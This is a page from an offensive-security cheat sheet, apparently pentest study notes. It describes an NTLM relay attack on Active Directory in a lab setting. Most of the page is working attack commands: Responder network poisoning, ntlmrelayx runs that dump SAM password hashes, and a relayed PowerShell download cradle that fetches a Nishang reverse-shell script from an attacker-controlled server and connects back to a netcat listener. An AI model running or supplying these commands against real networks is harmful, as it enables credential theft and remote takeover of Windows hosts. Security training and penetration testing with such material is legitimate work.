Cheat Sheet Hacking
  • 🌐Generic Ideas
    • File Transfer
    • Reverse Shell
    • Cracking Tricks
    • Tunneling and Port Forwarding
    • Reversing
    • OSINT
    • Phishing
  • 🐕‍🦺Port enumeration
    • Reconnaissance
    • 53 - DNS
    • 80,443 - Web
      • Identify php.ini file used
      • Exploitation
        • File Upload
        • XXS
    • 445 - SMB
    • 389, 636, 3268 - LDAP(S)
  • LINUX THINGS
    • Enumeration
    • Privilege Escalation
      • Writable $PATH
  • WINDOWS THINGS
    • Enumeration
    • Useful Commands
    • Active Directory Methodology
      • Commands to create AD environment
      • Attacks
        • Kerberos
          • User enumeration
          • ASREP-Roast
          • Kerberoasting
          • ASREP-Roast VS Kerberoasting
          • Golden Ticket
          • Resource Based Constrained Delegation
        • Secrets dump
        • Pass The Hash
        • Dump NTDS
        • Tickets
          • TGT
        • NTML Password Spray
        • LDAP Authentication
          • LDAP Pass-back
          • Rogue LDAP Server
        • SMB Relay (LLNMR, NTB-NS & WPAD)
        • NTLM Relay
        • Tools to exploit AD things
        • SCF Files
      • Kerberos
      • SAM & LSA secrets
      • Enumeration
        • BloodHound
        • PowerView
          • CheatSheet of Commands
        • Set DNS & DOMAIN
      • Resources
      • RunAs
      • Post Explotation
        • Persistence
        • Mimikatz
      • Common used tools
  • 🕳️Pivoting
    • Port Forwarding
    • Socks Forwarding
    • Routing
    • Web Fuzzing
    • Transfer files
    • Metasploit
      • Single Pivot
      • Double Pivot
    • Burp Suite
  • 🎛️Hardware
    • Physical attacks
  • 🌕Buffer Overflow
    • Introduction
    • Stack-Based
      • Introduction
        • Spiking
        • Fuzzing
        • Find Offset
        • Overwrite EIP
        • Find module
        • Find Badchars
        • Shellcode
  • 🐳Docker
    • Commands
    • Practical examples
  • 💡Useful things
    • Burp Suite
      • Proxy Activation
    • Linux Commands
    • Recreate multipart/form-data request
      • Python
      • HTML & netcat
    • TTY
    • Templates for reports (exams)
    • Tmux
    • Other cheat sheets
Powered by GitBook
On this page
  • Extract SAM hashes
  • Execute remote commands
  1. WINDOWS THINGS
  2. Active Directory Methodology
  3. Attacks

NTLM Relay

PreviousSMB Relay (LLNMR, NTB-NS & WPAD)NextTools to exploit AD things

Last updated 5 months ago

Imagine we have a user that is Administrator in other computer. We could use its power to extract the SAM hashes, even execute remote commands.

For example:

Sara Ardila is now Administrator over Carlos Villamizar (computer).

crackmapexec smb 10.10.10.0/24 -u 'sara.ardila' -p 'Sar@91082'

Extract SAM hashes

We need to create a file of targets (in this case PC-CARLOS):

And then, update the Responder.py configuration:

sudo python3 Responder/Responder.py -I eth0

Now, execute ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support

So, knowing that Sara is administrator over Carlos, we need to wait for a connection from Sara with a service or task. Using that poisoning on the network, we can trick the connection to travel across the network and end in our Responder, this will lead to take the privileges from the user Sara over Carlos and will do the magic using the ntlmrelayx.py program.

In Responder:

And ntlmrelayx:

And we are dumping SAM hashes, with these we can do Pass-The-Hash.

Execute remote commands

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 ipst.ps1

Take the line 20:

19 │ .EXAMPLE
20 │ PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Copy its content to the bottom of the file and change the values:

Now, serve that file and start a listener in the 4460 port to receive the PowerShell Reverse Shell:

➧ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
➧ nc -lvp 4460
listening on [any] 4460 ...

Now, execute ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://172.16.200.7:8000/ipst.ps1')"

With this, we are reaching the file in our server and importing its content, as we have the last line uncommented, that line will be executed after being imported.

Now, start our Responder (remember, with SMB and HTTP Off):

sudo python3 Responder/Responder.py -I eth0

Wait for the connection from Sara to a invalid or down service/task/folder:

In our listener:

We are inside CarlosPC exploiting the privilege from Sara in CarlosPC :O

From here

From here

https://github.com/lgandx/Responder
https://github.com/samratashok/nishang